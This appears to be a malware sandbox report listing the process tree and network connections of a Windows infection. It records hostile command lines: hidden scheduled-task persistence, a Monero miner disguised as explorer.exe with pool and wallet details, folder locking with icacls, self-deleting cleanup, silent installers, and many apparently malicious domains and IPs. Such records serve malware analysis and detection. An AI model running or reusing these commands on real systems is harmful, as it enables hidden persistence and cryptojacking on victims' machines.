"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2208 -s 1736

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 1016

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2644 -s 1728

C:\Program Files\Reference Assemblies\JFHSWFPXIN\ultramediaburner.exe

"C:\Program Files\Reference Assemblies\JFHSWFPXIN\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\51-31583-0b0-e0992-d54ca28c0218c\Maegyniniva.exe

"C:\Users\Admin\AppData\Local\Temp\51-31583-0b0-e0992-d54ca28c0218c\Maegyniniva.exe"

C:\Users\Admin\AppData\Local\Temp\is-CT7U1.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CT7U1.tmp\ultramediaburner.tmp" /SL5="$201D0,281924,62464,C:\Program Files\Reference Assemblies\JFHSWFPXIN\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\5a-3771c-ed7-6c2ac-dd4bf76ed0b6d\Pygamatulae.exe

"C:\Users\Admin\AppData\Local\Temp\5a-3771c-ed7-6c2ac-dd4bf76ed0b6d\Pygamatulae.exe"

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1988 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bl2sngqu.y1h\GcleanerEU.exe /eufive & exit

C:\Users\Admin\AppData\Local\Temp\bl2sngqu.y1h\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\bl2sngqu.y1h\GcleanerEU.exe /eufive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ainuhtc.1ra\installer.exe /qn CAMPAIGN="654" & exit

C:\Users\Admin\AppData\Local\Temp\5ainuhtc.1ra\installer.exe

C:\Users\Admin\AppData\Local\Temp\5ainuhtc.1ra\installer.exe /qn CAMPAIGN="654"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edkt0ld3.mjj\anyname.exe & exit

C:\Users\Admin\AppData\Local\Temp\edkt0ld3.mjj\anyname.exe

C:\Users\Admin\AppData\Local\Temp\edkt0ld3.mjj\anyname.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\flftcib1.xmr\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\flftcib1.xmr\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\flftcib1.xmr\gcleaner.exe /mixfive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ocpzlwtx.vq5\autosubplayer.exe /S & exit

C:\Users\Admin\AppData\Local\Temp\7FCA.exe

C:\Users\Admin\AppData\Local\Temp\7FCA.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bl2sngqu.y1h\GcleanerEU.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "GcleanerEU.exe" /f

C:\Users\Admin\AppData\Local\Temp\B933.exe

C:\Users\Admin\AppData\Local\Temp\B933.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\flftcib1.xmr\gcleaner.exe" & exit

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 85A7A19676FC294603DBD9ACB6594E24 C

C:\Users\Admin\AppData\Local\Temp\3777.exe

C:\Users\Admin\AppData\Local\Temp\3777.exe

C:\Users\Admin\AppData\Local\Temp\3777.exe

C:\Users\Admin\AppData\Local\Temp\3777.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1988 CREDAT:1258508 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\7A90.exe

C:\Users\Admin\AppData\Local\Temp\7A90.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1172 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\c43ca74d-b22c-42b4-ace9-1cda906f8147" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\3777.exe

"C:\Users\Admin\AppData\Local\Temp\3777.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\3777.exe

"C:\Users\Admin\AppData\Local\Temp\3777.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\9B79.exe

C:\Users\Admin\AppData\Local\Temp\9B79.exe

C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build2.exe

"C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build2.exe"

C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build3.exe

"C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build3.exe"

C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build2.exe

"C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build2.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5ainuhtc.1ra\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5ainuhtc.1ra\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631141042 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build3.exe

"C:\Users\Admin\AppData\Local\d917f537-c2a5-4e56-8482-00c8f9064511\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B16325436AE99986C1297171C48D5FBE

C:\Users\Admin\AppData\Local\Temp\DDC7.exe

C:\Users\Admin\AppData\Local\Temp\DDC7.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {B90DE740-182A-494F-A47E-D0DAABA30417} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "gcleaner.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1000 -s 1300

C:\Users\Admin\AppData\Local\Temp\6677.exe

C:\Users\Admin\AppData\Local\Temp\6677.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 888

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding F3D0DE1547150F6D381EA8C17D531CCF M Global\MSI0000

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7A90.exe"

C:\Users\Admin\AppData\Local\Temp\jj9DuSMyNL.exe

"C:\Users\Admin\AppData\Local\Temp\jj9DuSMyNL.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1988 CREDAT:1586195 /prefetch:2

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {D620086E-5B68-4EFC-AFE4-DF0ED0B9000A} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Roaming\sjfgihh

C:\Users\Admin\AppData\Roaming\sjfgihh

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1988 CREDAT:3027978 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\c43ca74d-b22c-42b4-ace9-1cda906f8147\3777.exe

C:\Users\Admin\AppData\Local\c43ca74d-b22c-42b4-ace9-1cda906f8147\3777.exe --Task

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\sjfgihh

C:\Users\Admin\AppData\Roaming\sjfgihh

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1988 CREDAT:3617825 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:9084 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\c43ca74d-b22c-42b4-ace9-1cda906f8147\3777.exe

C:\Users\Admin\AppData\Local\c43ca74d-b22c-42b4-ace9-1cda906f8147\3777.exe --Task

C:\Users\Admin\AppData\Local\c43ca74d-b22c-42b4-ace9-1cda906f8147\3777.exe

C:\Users\Admin\AppData\Local\c43ca74d-b22c-42b4-ace9-1cda906f8147\3777.exe --Task

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231

C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe

"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 172.67.142.91:80 hsiens.xyz tcp
US 8.8.8.8:53 a.goatgame.co udp
US 104.21.79.144:443 a.goatgame.co tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 startupmart.bar udp
US 104.21.37.182:443 startupmart.bar tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 wheelllc.bar udp
US 172.67.136.53:443 wheelllc.bar tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 qwertys.info udp
US 104.21.20.198:443 qwertys.info tcp
US 8.8.8.8:53 yelty.info udp
US 104.21.17.186:443 yelty.info tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 phonefix.bar udp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
US 8.8.8.8:53 live.goatgame.live udp
US 172.67.131.66:443 phonefix.bar tcp
US 104.21.70.98:443 live.goatgame.live tcp
US 208.95.112.1:80 ip-api.com tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
SC 185.215.113.104:18754 tcp
DE 88.99.66.31:443 iplogger.com tcp
RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 real-web-online.bar udp
US 104.21.74.148:443 real-web-online.bar tcp
US 8.8.8.8:53 sanctam.net udp
SE 185.65.135.234:58899 sanctam.net tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.23.98.190:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.78.68:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
N/A 127.0.0.1:61901 tcp
N/A 127.0.0.1:61903 tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 go.rolltrafficroll.com udp
NL 212.32.252.129:443 go.rolltrafficroll.com tcp
NL 212.32.252.129:443 go.rolltrafficroll.com tcp
US 8.8.8.8:53 expensivesurvey.online udp
US 104.26.15.220:443 expensivesurvey.online tcp
US 104.26.15.220:443 expensivesurvey.online tcp
US 104.26.15.220:443 expensivesurvey.online tcp
US 104.26.15.220:443 expensivesurvey.online tcp
US 104.26.15.220:443 expensivesurvey.online tcp
US 104.26.15.220:443 expensivesurvey.online tcp
US 8.8.8.8:53 propeller-tracking.com udp
NL 139.45.197.240:443 propeller-tracking.com tcp
NL 139.45.197.240:443 propeller-tracking.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 216.239.32.29:80 pki.goog tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
NL 23.209.125.81:80 crl.microsoft.com tcp
US 8.8.8.8:53 crl.pki.goog udp
NL 142.250.179.163:80 crl.pki.goog tcp
US 8.8.8.8:53 crl3.digicert.com udp
NL 142.250.179.163:80 crl.pki.goog tcp
US 93.184.220.29:80 crl3.digicert.com tcp
US 8.8.8.8:53 mc.yandex.ru udp
RU 93.158.134.119:443 mc.yandex.ru tcp
RU 93.158.134.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 142.250.102.154:443 stats.g.doubleclick.net tcp
US 142.250.102.154:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 google.com udp
NL 139.45.197.240:443 propeller-tracking.com tcp
US 142.250.102.154:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 www.google.nl udp
US 142.251.36.3:443 www.google.nl tcp
US 142.251.36.3:443 www.google.nl tcp
US 8.8.8.8:53 repository.certum.pl udp
NL 104.110.191.14:80 repository.certum.pl tcp
US 142.251.36.3:443 www.google.nl tcp
US 8.8.8.8:53 crls.pki.goog udp
US 142.251.36.14:80 crls.pki.goog tcp
RU 93.158.134.119:443 mc.yandex.ru tcp
US 104.26.15.220:443 expensivesurvey.online tcp
US 104.26.15.220:443 expensivesurvey.online tcp
RU 93.158.134.119:443 mc.yandex.ru tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 crl.certum.pl udp
US 8.8.8.8:53 yandex.ocsp-responder.com udp
US 8.8.8.8:53 yandex.ocsp-responder.com udp
US 8.8.8.8:53 yandex.crl.certum.pl udp
US 8.8.8.8:53 crls.yandex.net udp
US 8.8.8.8:53 yandex.crl.certum.pl udp
RU 5.45.205.243:80 crls.yandex.net tcp
RU 5.45.205.241:80 crls.yandex.net tcp
RU 5.45.205.241:80 crls.yandex.net tcp
NL 104.110.191.14:80 yandex.crl.certum.pl tcp
NL 104.110.191.14:80 yandex.crl.certum.pl tcp
NL 104.110.191.14:80 yandex.crl.certum.pl tcp
RU 5.45.205.241:80 crls.yandex.net tcp
NL 104.110.191.14:80 yandex.crl.certum.pl tcp
US 8.8.8.8:53 ocsp.verisign.com udp
NL 104.110.191.14:80 yandex.crl.certum.pl tcp
NL 104.110.191.14:80 yandex.crl.certum.pl tcp
DE 23.51.123.27:80 ocsp.verisign.com tcp
US 8.8.8.8:53 varmisende.com udp
KW 37.34.248.24:80 varmisende.com tcp
US 8.8.8.8:53 fernandomayol.com udp
RO 88.158.247.38:80 fernandomayol.com tcp
US 162.0.220.187:80 requestimmersive.com tcp
UA 194.145.227.159:80 194.145.227.159 tcp
RO 88.158.247.38:80 fernandomayol.com tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 104.21.33.188:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
RO 88.158.247.38:80 fernandomayol.com tcp
US 8.8.8.8:53 aa.goatgamea.com udp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 8.8.8.8:53 bb.goatgamed.com udp
US 172.67.173.237:443 bb.goatgamed.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 a.goatgame.co udp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 172.67.146.70:443 a.goatgame.co tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
RO 88.158.247.38:80 fernandomayol.com tcp
SC 185.215.113.29:8678 tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
US 93.184.220.29:80 crl3.digicert.com tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
NL 146.70.35.170:30905 tcp
US 8.8.8.8:53 api.ip.sb udp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
US 104.26.13.31:443 api.ip.sb tcp
US 93.184.220.29:80 crl3.digicert.com tcp
US 8.8.8.8:53 securebiz.org udp
MX 189.129.135.205:80 securebiz.org tcp
US 8.8.8.8:53 crl4.digicert.com udp
US 93.184.220.29:80 crl4.digicert.com tcp
US 104.26.13.31:443 api.ip.sb tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
US 8.8.8.8:53 telete.in udp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
DE 195.201.225.248:443 telete.in tcp
US 8.8.8.8:53 api.2ip.ua udp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
UA 77.123.139.190:443 api.2ip.ua tcp
RO 88.158.247.38:80 fernandomayol.com tcp
MD 5.181.156.77:80 5.181.156.77 tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
RO 88.158.247.38:80 fernandomayol.com tcp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.5.163:80 www.microsoft.com tcp
UA 77.123.139.190:443 api.2ip.ua tcp
US 8.8.8.8:53 theonlygames.com udp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 104.21.235.53:443 theonlygames.com tcp
US 8.8.8.8:53 ln.gamesrevenue.com udp
US 204.155.147.176:443 ln.gamesrevenue.com tcp
US 204.155.147.176:443 ln.gamesrevenue.com tcp
RU 93.158.134.119:443 mc.yandex.ru tcp
RU 93.158.134.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 tbpws.top udp
MX 189.129.135.205:80 securebiz.org tcp
KR 210.92.250.133:80 tbpws.top tcp
KR 210.92.250.133:80 tbpws.top tcp
US 8.8.8.8:53 fernandomayol.com udp
EG 41.41.255.235:80 fernandomayol.com tcp
DE 144.76.183.53:63565 tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 104.26.13.31:443 api.ip.sb tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 162.0.220.187:80 requestimmersive.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
MD 5.181.156.77:80 5.181.156.77 tcp
US 8.8.8.8:53 jaliemaval.xyz udp
RU 95.213.165.250:80 jaliemaval.xyz tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
